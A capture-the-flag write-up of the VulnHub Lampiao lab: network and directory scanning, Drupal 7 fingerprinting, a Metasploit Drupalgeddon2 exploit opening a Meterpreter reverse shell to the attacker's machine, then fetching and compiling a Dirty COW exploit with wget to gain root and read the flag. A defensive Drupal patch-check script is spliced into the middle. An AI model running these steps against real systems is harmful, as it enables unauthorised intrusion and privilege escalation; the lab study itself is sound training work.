Background overview:
1. Information gathering
1.1 Scanning for the target host's IP
Download address: https://www.vulnhub.com/entry/lampiao-1,249/
The target machine's IP in this exercise is 192.168.2.230.
Use nmap for live-host discovery with the command nmap -sP 192.168.2.0/24; the scan results are as follows.
└─$ sudo nmap -sP 192.168.2.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 11:27 CST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: about 22.16% done; ETC: 11:27 (0:00:07 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: about 100.00% done; ETC: 11:27 (0:00:00 remaining)
Nmap scan report for 192.168.2.2
Host is up (0.21s latency).
MAC Address: EC:3C:BB:AE:B7:45 (Huawei Device)
Nmap scan report for 192.168.2.45
Host is up (0.11s latency).
MAC Address: 42:63:96:C3:0E:82 (Unknown)
……
Nmap scan report for 192.168.2.230
Host is up (0.00033s latency).
MAC Address: 00:0C:29:B8:50:AD (VMware)
From the MAC address vendor (VMware) we can tell that the target's IP address is 192.168.2.230.
1.2 Scanning the target host's open ports
Use nmap to scan the target host's open ports with the command nmap -p 1-65535 -sS -Pn 192.168.2.230; the scan gives:
└─$ sudo nmap -p 1-65535 -sS -Pn 192.168.2.230
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 12:18 CST
Nmap scan report for 192.168.2.230
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:0C:29:B8:50:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
The scan shows that the target host has three open ports: 22, 80 and 1898.
1.3 Directory scanning
Use dirb to scan the target's directories, once against port 80 and once against port 1898; port 1898 turns out to have directories that may be exploitable.
└─$ sudo dirb http://192.168.2.230:1898/                                                                                  255 ⨯
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Dec 7 12:44:48 2021
URL_base: http://192.168.2.230:1898/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.2.230:1898/ ----
==> DIRECTORY: http://192.168.2.230:1898/includes/
+ http://192.168.2.230:1898/index.php (CODE:200|SIZE:11423)
==> DIRECTORY: http://192.168.2.230:1898/misc/
==> DIRECTORY: http://192.168.2.230:1898/modules/
==> DIRECTORY: http://192.168.2.230:1898/profiles/
+ http://192.168.2.230:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.2.230:1898/scripts/
+ http://192.168.2.230:1898/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.2.230:1898/sites/
==> DIRECTORY: http://192.168.2.230:1898/themes/
+ http://192.168.2.230:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.2.230:1898/xmlrpc.php (CODE:200|SIZE:42)
……
-----------------
END_TIME: Tue Dec 7 12:44:56 2021
DOWNLOADED: 4612 - FOUND: 5
So the site has the directories http://192.168.2.230:1898/includes/, http://192.168.2.230:1898/misc/, http://192.168.2.230:1898/modules/, http://192.168.2.230:1898/profiles/, http://192.168.2.230:1898/scripts/, http://192.168.2.230:1898/sites/ and http://192.168.2.230:1898/themes/.
1.4 Fingerprinting
- Use the Yujian (御剑) web fingerprinting system to fingerprint the site: add http://192.168.2.230:1898 as the site and scan; the application fingerprint comes back as Drupal.
- That does not give the CMS version, so we can use CMSeek to probe it with the command python3 cmseek.py -u 192.168.2.230:1898, which reports Drupal 7.
- Use httprint to probe the middleware; the target server is Apache/2.4.7 (Ubuntu).
- Use nmap to probe the service version on the target port with the command nmap -sV -p 1898 192.168.2.230; the result shows Apache listening on port 1898, version Apache httpd 2.4.7 ((Ubuntu)).
- From step three we know that the target operating system is Ubuntu.
Searching for vulnerabilities affecting Drupal 7 turns up CVE-2018-7600, a code-execution flaw in Drupal 7.x; we try to attack it with msf.
┌──(root㉿kali)-[/home/hehao/桌面/CMSeeK]
└─# msfdb run // start msf
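From the defender's side, the fingerprinting above stops at "Drupal 7" without an exact release, and whether CVE-2018-7600 applies depends on the patch level. The following check is an added example, not part of the original walkthrough or of Drupal itself: it reads the core version string from Drupal 7's includes/bootstrap.inc (or Drupal 8's core/lib/Drupal.php) and compares it with the releases that shipped the fix (SA-CORE-2018-002: 7.58, 8.3.9, 8.4.6, 8.5.1). The sample file contents are constructed; the file paths and the branch table are assumptions of this example.

```python
import re

# Releases that shipped the fix for CVE-2018-7600 (SA-CORE-2018-002),
# keyed by branch. Any older release on the same branch is affected.
# Assumption of this example: branches not listed are reported as unknown,
# except 8.6+ which was cut after the fix.
FIXED_VERSIONS = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}


def parse_version(text):
    """Extract the core version from Drupal 7's includes/bootstrap.inc
    (define('VERSION', '7.x')) or Drupal 8's core/lib/Drupal.php
    (const VERSION = '8.x.y'). Returns a tuple of ints, or None."""
    pattern = (r"""(?:define\(\s*['"]VERSION['"]\s*,\s*|const\s+VERSION\s*=\s*)"""
               r"""['"]([0-9][0-9.]*)[A-Za-z0-9-]*['"]""")
    m = re.search(pattern, text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).rstrip(".").split("."))


def is_fixed(version):
    """True if the release includes the SA-CORE-2018-002 fix, False if it is
    older than the fix on a known branch, None if the branch is unknown."""
    if version is None:
        return None
    branch = version[:1] if version[0] == 7 else version[:2]
    fixed = FIXED_VERSIONS.get(branch)
    if fixed is None:
        return True if version >= (8, 6) else None
    return version >= fixed


# Constructed sample of a Drupal 7 includes/bootstrap.inc fragment; on a real
# host this would be read from the web root during a patch audit.
SAMPLE_BOOTSTRAP = """
/**
 * The current system version.
 */
define('VERSION', '7.54');
"""

if __name__ == "__main__":
    v = parse_version(SAMPLE_BOOTSTRAP)
    print("Drupal", ".".join(map(str, v)), "patched for CVE-2018-7600:", is_fixed(v))
```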
[+] Starting database
=[ metasploit v6.0.45-dev ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
metasploit tip: View all productivity tips with the
tips command
[*] Starting persistent handler(s)...
msf6 > search CVE:2018-7600 // search for exploit modules for CVE-2018-7600
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 // use this exploit module
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options // view the option parameters
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.253 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.230 // set the target IP
RHOSTS => 192.168.2.230
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898 // set the target port
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run // run: start the attack
[*] Started reverse TCP handler on 192.168.2.253:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.2.230
[*] Meterpreter session 1 opened (192.168.2.253:4444 -> 192.168.2.230:54384) at 2021-12-08 16:13:52 +0800
shell
meterpreter > shell // drop into a shell
Shell obtained successfully!
3. Privilege escalation
Getting an interactive shell: the shell we obtained is not fully interactive. On a system that has Python installed we can use Python's pty module; a single line of script creates a native terminal.
In the shell, enter the command python -c 'import pty; pty.spawn("/bin/bash")'.
Continue gathering information: the command uname -a returns Linux lampiao 4.4.0-31-generic. The Linux kernel version here is 4.4.0, so Dirty COW can be used for privilege escalation.
On the Kali attack machine, search for the corresponding exploit and start an HTTP server in the current folder to transfer it.
└─# searchsploit dirty // search for the exploit
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege E | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalati | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/home/hehao/桌面]
└─# searchsploit -m 40847.cpp // with the -m option, copy 40847.cpp into the current folder
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40847
Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/hehao/桌面/40847.cpp
┌──(root㉿kali)-[/home/hehao/桌面]
└─# python3 -m http.server 8888 // start an HTTP server in the current directory to serve the file
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.2.252 - - [08/Dec/2021 16:46:12] "GET /40847.cpp HTTP/1.1" 200 -
In the shell on the target machine, download the remote file, compile and run it to obtain the root account, then enter the root directory and read the flag:
www-data@lampiao:/var/www/html$ wget http://192.168.2.253:8888/40847.cpp // download the remote file
wget http://192.168.2.253:8888/40847.cpp
--2021-12-08 06:46:11-- http://192.168.2.253:8888/40847.cpp
Connecting to 192.168.2.253:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'
100%[======================================>] 10,531 --.-K/s in 0s
2021-12-08 06:46:11 (100 MB/s) - '40847.cpp' saved [10531/10531]
www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil // compile, producing a dcow binary
/proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# whoami // check the current privileges
whoami
root
root@lampiao:~# cd /root // enter the root directory
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt // get the flag
cat flag.txt
9740616875908d91ddcdaa8aea3af366